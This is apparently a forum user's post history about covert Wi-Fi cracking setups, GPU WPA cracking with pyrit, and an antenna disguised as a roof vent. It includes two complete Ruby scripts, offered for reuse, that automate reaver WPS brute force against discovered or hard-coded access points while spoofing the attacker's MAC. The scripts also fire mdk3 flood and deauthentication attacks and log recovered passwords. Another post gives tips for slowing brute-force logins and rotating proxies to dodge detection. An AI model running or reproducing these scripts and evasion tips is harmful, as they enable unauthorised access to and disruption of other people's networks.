i8igmac
-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
i did test my wordlist on my ssd with pyrit, i dont think my pmks have passed the speeds my standerd hd can serve... no bottleneck there
i would love to build a new computer, some small ssd's like the link i posted above could maybe produce insane speeds at afordable cost...
I have been looking at bang for the buck video cards and server boards (4 socket cpu/4 socket gpu)
-
my desktop does have enough free space on its ssd for this wordlist... I spend more hours thinking about what I'm going to test before I actually perform them... interested to see if it shows a improvement...
I have not yet overclocked anything, this AMD1090t kicks ass @10000pmks :-p
At the moment I'm only testing attack_passthrough... I don't have much free harddrive space to build a database
-
I did some experimenting with pyrit cluster configuration... took my usb-kali-nvidia-stick and cloned it using a dd method...
Started up my 2 sexy machines.
Labtop geforce gtx 560m + i7
Desktop geforce gtx 460 + AMD1090t
Labtop ->14000pmks
Desktop->20000pmks
With pyrit configured to serve as a cluster I ran a benchmark and only got 24000pmks... could be my old linksys switch, ill test others another day...
I want to see 34000pmks!
So here is what I did... I took Super-WPA wordlist
wc -l Super-WPA => 980million lines
So I rounded up to the nearest billion and split the file into 2 parts based on performance
split Super-WPA --lines=800000000
Desktop gets 800,000,000
Labtopp gets 180,000,000
If my math is correct they should complete the task at close to the same time...
-
ako69co8
Correct me if I'm wrong.
firstly, a default password written on the back of a router is 8 chars long? 0-9 and a-z?
36x36x36x36x36x36x36x36=2821109907456
Looks like 2.8 trillion password possibilities?
again correct me...
what would be the most cost effective way to build a machine capable of this crack
1000 video cards? Lol idk
-
Just wanted to share what I have setup today... placed 2 alfa cards in a black water proof tube, attached to a fence board cut at 30 degree angle.
Sits on the top of the roof ment to look like a vent pipe...
slid the 2 usb cords threw a existing roof cap Screen...
Raspberry pi inside the attic space...
planning on sharing a wifi crack script... set it and forget it...
Question about a single wireless card performing reaver attacks... could yout set the card to channel 1 and then launch a multi threaded reaver attack against all device's on channel 1?
-
is this offline mode?...
if you are supplying internet access you may also want to add squid cache server... lighter load on bandwidth
I have this on my home network, quicker content will be served to the client's
-
I would say, raspberry pi is the answer.
-
tshark -r <input file> -R "eapol || wlan_mgt.tag.interpretation eq <essid> || (wlan.fc.type_subtype==0x08 && wlan_mgt.ssid eq <essid>)" -w <output file>
I wonder if tshark will do a regex or wildcard for the essid.
Wlan_mgt.tag.interpretation eq *
-
I would like to sort through a list of CAP files and extract only the data needed for cracking...
these files can become very large in size, just looking for a way to process and save hard drive space...
command line examples!
-
Http://images.offensive-security.com/1.0.9/kali-1.0.9-rpi.img.xz
xz -d kali-1.0.9-rpi.img.xz
have you download this file up here? works out of the box...
-
Cooper. how close are you to assembling a proof of concept?
-
I think you change /etc/hosts
-
Very cool. I'm currently working on some drop box type stuff. I don't own a pineapple...
Raspberry pi b+ with kali installed on 30gig sd card. 15000 battery running 2 alfa cards I can get 12 hours. Running the pi alone I can get maybe 30 hours
-
I am also curious in a explanation on 'whats behind the hash'
Computers solving the hash, what is this hash, a password?
Hundreds of millions of machines working together to crack a hash?
-
So, i have decided to share one of my projects, i figure i wont get much attention with this script, witch is why im sharing...
i made a video i hope is quick to the point and informative... please share your comments... if there are any interested i may add some more functions to this script like capturing handshakes for cracking later...
all you need is a linux machine, a wireless adapter (the more the better)... ruby and a ruby requirement open3...
updated code...
require 'open3' #on reboot stuff. device="" channel="" ap_mac="" essid="" @device_list=["wlan1"] @check=[] #sleep 30 #sleep if you plan to start this script from startup.rc... give drives a chance to load #`ifconfig wlan0 down` #`iwconfig wlan0 mode monitor` #`ifconfig wlan0 up` `ifconfig wlan1 down` `iwconfig wlan1 mode monitor` `ifconfig wlan1 up` #will not launch until the While true: at bottem #reaver attack and log def reaver(device, channel, ap_mac) Thread.start{ #`ifconfig #{device} down` #`iwconfig #{device} mode monitor` #`ifconfig #{device} up` #puts "Random mac..." Open3.popen3("iwconfig #{device} channel #{channel}") puts "change #{channel}" Open3.popen3("ifconfig #{device} down") puts "down" #Open3.popen3("macchanger #{device} -r") puts "changemac" Open3.popen3("ifconfig #{device} up") puts "up" puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}" Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}"){|i,o,t,p| i.puts("y") #tell reaver Yes to continue where the attack left off while line=o.gets if select([o],nil,nil,15) puts "#{device} #{ap_mac}: #{line}" log_all=File.open("log_all_#{ap_mac}",'a') log_all.puts("#{device} #{ap_mac}: #{line}") log_all.close #100.00% complete #Pin cracked in #WPS PIN: '12345678' #WPA PSK: 'asshole' #AP SSID: 'noob' # Log success to another file if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:") success=File.open("sucess_#{ap_mac}",'a') success.puts("#{device} #{ap_mac}: #{line}") success.close end if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row") puts "#{device} #{ap_mac}: killing thread" @check.delete(device)#remove the card from the list... can now be used in a new process Process.kill("KILL",p.pid) end else puts "#{device} #{ap_mac}: TIMEOUT" @check.delete(device) Process.kill("KILL",p.pid) break end end @check.delete(device) Process.kill("KILL",p.pid) } @check.delete(device) Process.kill("KILL",p.pid) } #thread.start end #will not launch until the While true: at bottem def mdk3(device, channel, ap_mac, essid) Open3.popen3("iwconfig #{device} channel #{channel}") Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } end #44:94:FC:3B:E9:16 7 ANDY DALTON SOUR HOUR #28:C6:8E:A3:10:7A 11 NETGEAR01 #the main reason for this script # if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart #just added a few extra dos attacks #reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6 #reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8 def gather() scan_complete=false while scan_complete==false @device_list.each{|wlan| if not @check.include?(wlan) puts "#{wlan} scanning with wash" buff="" Open3.popen3("wash -i #{wlan} -C"){|i,o,t,p| Thread.start{sleep 25; Process.kill("KILL",p.pid)}; while line=o.gets; if not line.nil?; buff<<line; end; end} @list=[] buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line{|x| if x.include?("No"); @list<<"#{x.split[1]} #{x.split[0]}"; end; } puts @list scan_complete=true break else puts "waiting for device to free up... redo" sleep 3 next end } end end try_again=false while true gather() @list.each{|stack| #puts "trying #{stack}" sleep 1 @device_list.each{|wlan| if not @check.include?(wlan) puts @check @check<<wlan #reaver("wlan2", "6", "20:76:00:1C:D9:C8") reaver("#{wlan.chomp}","#{stack.split[0]}", "#{stack.split[1]}") try_again=false break else try_again=true end } if try_again==true redo end } end -
http://www.fit-pc.com/web/products/mintbox-mini/
Have u seen the mintbox mini? Seems like huge performance in a small package...
The MintBox Mini is powered by an AMD A4 6400T and a Radeon R3 GPU and equipped with 4GB RAM and 64GB SSD
cooper, any ideas for finding identical performance or close to, at a low cost?
-
save script as reaver.rb
Ruby reaver.rb
Edit:
My reaver dropbox has been running for about 12 hours now. With 2 alfa card ;-)
-
require 'open3' #on reboot stuff. device="wlan2" channel="8" ap_mac="4C:60:DE:31:C3:79" essid="NETGEAR34" `ifconfig #{device} down` `iwconfig #{device} mode monitor` `ifconfig #{device} up` #will not launch until the While true: at bottem #reaver attack and log def reaver(device, channel, ap_mac) Thread.start{ puts "Random mac..." Open3.popen3("ifconfig #{device} down") Open3.popen3("macchanger #{device} -r") Open3.popen3("ifconfig #{device} up") Open3.popen3("reaver -i #{device} -vv --dh-small -b #{ap_mac} -c #{channel}"){|i,o,t| i.puts("y") #tell reaver Yes to continue where the attack left off while line=o.gets #Log all reaver output to a file puts line log_all=File.open("log_all_#{ap_mac}",'a') log_all.puts(line) log_all.close #100.00% complete #Pin cracked in #WPS PIN: '12345678' #WPA PSK: 'asshole' #AP SSID: 'noob' # Log success to another file if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:") success=File.open("sucess_#{ap_mac}",'a') success.puts(line) success.close end end } } #thread.start end #will not launch until the While true: at bottem def mdk3(device, channel, ap_mac, essid) Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } end #the main reason for this script # if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart #just added a few extra dos attacks #reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6 #reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8 while true #reaver(device, channel, ap_mac) reaver("wlan2", "6", "20:76:00:1C:D9:C8") reaver("wlan0", "8", "4C:60:DE:31:C3:79") #run for 10 minutes, then restart sleep 10*60 `killall reaver` #mdk3(device, channel, ap_mac, essid) mdk3("wlan2", "6", "20:76:00:1C:D9:C8", "myqwest4681") mdk3("wlan0", "8", "4C:60:DE:31:C3:79", "NETGEAR34") sleep 2*60 `killall mdk3` endSo, its something i made real quick... i tried to keep it simple...
you have to modify the while true: loop to work for you...
if you set the options at the top, then you simply need to use this.
reaver(device, channel, ap_mac)
exactly as shown inside the while true loop.
then it will run reaver for 10*60 seconds (ten minutes)
then it will kill reaver and launch some mdk3 attacks for 2 minutes
a new mac is generated before each reaver thread starts.
i could add a if "rate detected" then trigger the mdk3 attack. g2g
-
Its all depending on the configuration. Each machine may have custom modules or brute force prevention software installed...
If you send off 5 failed attempts to quickly, even tho your 6th attempt is valid login credentials, brute force detection kicks in and responds with unauthorized...
If you can find the variable of how many attempts trigger the red flag, then slow down the attack by a few seconds for each attempt. You may find the sweet spot
so, now you found your attack speed is slow as hell, 1 password per 3 minutes will safely evade any red flags (example)
How many proxy's will it take to achieve 1pass per second ?
-
there are all kinds of scripts all over pastebin.
today I have just assembled a reaver Dropbox.
Anker 15000mah
awus036h
Awus036nha
Usb powered hub
And raspberry pi b+ kali installed.
I have wrote 2 scripts. one will simply log how long the battery will last.
and then I have made a script that performs some Reaver attacks on a large list of MAC addresses.
reaver wlan0 mac-from-list
reaver wlan1 mac-from-list
2 access points will be attacked for 5 minutes at a time. then will move onto the next 2 mac addresses in the list with a newly generated mac address.
I like to call this a shotgun blast... ill have to share the script another time. I could set you up with a barebones example script... ruby for the win!
-
impressed in so many ways lol... I made it the first,
"nothing you say to the cops will help u in court"
"It can only help them convict you"
And plenty of examples to back up his theory
-
Its been A decade since I used windows as my daily operating system but I never ran into milware/viri I couldn't remove... antivirus software is crap from my experience...
You should watch netstat -nb when installing newsoftware
-
don't use the Administrator user... create a user account with less privileges, use this new account...
If you can't remove a infection then just delete the account and create a new one.
My dad brings me his computer saying its infected... its a quick fix
-
i have found a nice little tutorial on building parabola's.
http://www.instructables.com/id/Parabola-Plotting-Web-Pages/?ALLSTEPS
if everything is printed out properly, you could construct a clean and precise parabola...
So, with the use of this little bit of java script
http://www.idea2ic.com/OtherStuff/Web_parabola/Plot%20A%20Parabola%20segment.html
you can print out 12 segments tape together a clean prototype... But when i look at the Left side or Right side im Not sure where the focal point is located...
Maybe some one could look at this little script and find a way to place a X at the focal point location?
<!DOCTYPE html> <html> <head> <title> Parabola Segments </title> <script> function drawPicture(form) { var canvas = document.getElementById('example'); // link to id='example' var context = canvas.getContext('2d'); // create graphic context var scale = 350; var gain = 1; var radius = 1; var focal = form.foc.value; var step = 0.1; var Num_seg = 24; var a = 1/(4*focal); var x0 = scale*.6; var y0 = scale*2; var x ,y, dx ,dy,ds,angle,x_g,y_g; var s = 0; var x_last= 0; var y_last= 0; var X_calc = new Array(11); var Y_calc = new Array(11); var S_calc = new Array(11); for (i=0; i<=10; i++) //Calc Parabola data { x = step*i; y = a*x*x; dx = x-x_last; dy = y-y_last; ds = Math.pow(dx*dx+dy*dy,.5); s = s + ds; X_calc[i] = x; //X_data Y_calc[i] = y; //Y_data S_calc[i] = s; //Surface_data angle = (x/s)*2*Math.PI/Num_seg; x_last= x; y_last= y; } gain = 1.99/S_calc[10]; context.clearRect( 0,0,scale*2,scale*2); //ÊclearÊcanvasÊ context.strokeStyle = "Black"; context.beginPath(); context.fillStyle = "rgb( 255, 255, 255)"; // red, grn, blu context.fillRect ( 0, 0, scale*2, scale*2); // or draw white box context.fill(); if (form.s1[0].checked) //Draw segements? { context.moveTo( x0, y0); // move to origin for (i=0; i<=10; i++) { angle = (X_calc[i]/S_calc[i])*2*Math.PI/Num_seg; x_g = gain*scale*S_calc[i]*Math.sin(angle); y_g = -gain*scale*S_calc[i]*Math.cos(angle); context.lineTo( x_g + x0, y_g + y0 ); } context.stroke(); context.strokeStyle = "Black"; context.moveTo( x0, y0); // move to origin for (i=0; i<=10; i++) { angle = (X_calc[i]/S_calc[i])*2*Math.PI/Num_seg; x_g = -gain*scale*S_calc[i]*Math.sin(angle); y_g = -gain*scale*S_calc[i]*Math.cos(angle); context.lineTo( x_g + x0, y_g + y0 ); } context.stroke(); //context.strokeStyle = "Black"; for (j=1; j<=10; j++) { angle = (X_calc[j]/S_calc[j])*2*Math.PI/Num_seg; y_g = -gain*scale*S_calc[j]; context.moveTo( x0, y_g + y0); // move to origin for (i=0; i<=10; i++) { x_g = gain*scale*S_calc[j]*Math.sin(angle*i/10); y_g = -gain*scale*S_calc[j]*Math.cos(angle*i/10); context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); y_g = -gain*scale*S_calc[j]; context.moveTo( x0, y_g + y0); // move to origin for (i=0; i<=10; i++) { x_g = -gain*scale*S_calc[j]*Math.sin(angle*i/10); y_g = -gain*scale*S_calc[j]*Math.cos(angle*i/10); context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); } x0 = scale*1.4; // draw second segment y0 = 0; context.moveTo( x0, y0); // move to origin for (i=0; i<=10; i++) { angle = (X_calc[i]/S_calc[i])*2*Math.PI/Num_seg; x_g = gain*scale*S_calc[i]*Math.sin(angle); y_g = gain*scale*S_calc[i]*Math.cos(angle); context.lineTo( x_g + x0, y_g + y0 ); } context.stroke(); context.moveTo( x0, y0); // move to origin for (i=0; i<=10; i++) { angle = (X_calc[i]/S_calc[i])*2*Math.PI/Num_seg; x_g = -gain*scale*S_calc[i]*Math.sin(angle); y_g = gain*scale*S_calc[i]*Math.cos(angle); context.lineTo( x_g + x0, y_g + y0 ); } context.stroke(); for (j=1; j<=10; j++) { angle = (X_calc[j]/S_calc[j])*2*Math.PI/Num_seg; y_g = gain*scale*S_calc[j]; context.moveTo( x0, y_g + y0); // move to origin for (i=0; i<=10; i++) { x_g = gain*scale*S_calc[j]*Math.sin(angle*i/10); y_g = gain*scale*S_calc[j]*Math.cos(angle*i/10); context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); y_g = gain*scale*S_calc[j]; context.moveTo( x0, y_g + y0); // move to origin for (i=0; i<=10; i++) { x_g = -gain*scale*S_calc[j]*Math.sin(angle*i/10); y_g = gain*scale*S_calc[j]*Math.cos(angle*i/10); context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); } } if (form.s1[1].checked) // draw left side { x0 = 50; y0 = scale*2-100; context.moveTo( x0, y0); for (i=0; i<=10; i++) { x_g = gain*scale*X_calc[i]; y_g = -gain*scale*Y_calc[i]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); for (i=0; i<=10; i++) { x_g = gain*scale*X_calc[i]; y_g = -gain*scale*Y_calc[0]; context.moveTo( x_g + x0, y_g + y0); // move to origin y_g = -gain*scale*Y_calc[10]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); for (i=0; i<=10; i++) { x_g = gain*scale*X_calc[0]; y_g = -gain*scale*Y_calc[i]; context.moveTo( x_g + x0, y_g + y0); // move to origin x_g = gain*scale*X_calc[10]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); } if (form.s1[2].checked) // draw left side { x0 = 2*scale-50; y0 = scale*2-100; context.moveTo( x0, y0); for (i=0; i<=10; i++) { x_g = -gain*scale*X_calc[i]; y_g = -gain*scale*Y_calc[i]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); for (i=0; i<=10; i++) { x_g = -gain*scale*X_calc[i]; y_g = -gain*scale*Y_calc[0]; context.moveTo( x_g + x0, y_g + y0); // move to origin y_g = -gain*scale*Y_calc[10]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); for (i=0; i<=10; i++) { x_g = -gain*scale*X_calc[0]; y_g = -gain*scale*Y_calc[i]; context.moveTo( x_g + x0, y_g + y0); // move to origin x_g = -gain*scale*X_calc[10]; context.lineTo( x_g + x0, y_g + y0); // move to origin } context.stroke(); } context.closePath(); // form.REC.value = form.REC.value +"S_calc[i]"+S_calc[10]+" \n" ; } </script> <style type = "text/css"> canvas { border: 2px solid gray; } </style> </head> <body> <h1>Parabola 1/12 Segments or Sides </h1> <form > <input type=text size = "10" value=".5" name="foc" onkeypress="drawPicture(this.form)"> =>Define a parabola focal point => <input type=button value="Plot_it" onClick="drawPicture(this.form)"> <input type="radio" Name=s1 checked="checked" Value = "Seg" /> segments</label> <input type="radio" Name=s1 Value = "LSide" /> <label for="sidecheck"> Left Side</label> <input type="radio" Name=s1 Value = "RSide" /> <label for="sidecheck"> Right Ride</label> <p> <canvas id = "example" width="700" height="700"> </canvas> <br> </form> </body> </html>
mac logging & proximity alerts
in WiFi Pineapple Mark V
Posted
Dnsmasq has log files with all this information
/var/log/daemon.log
could display this information threw the pinapple webgui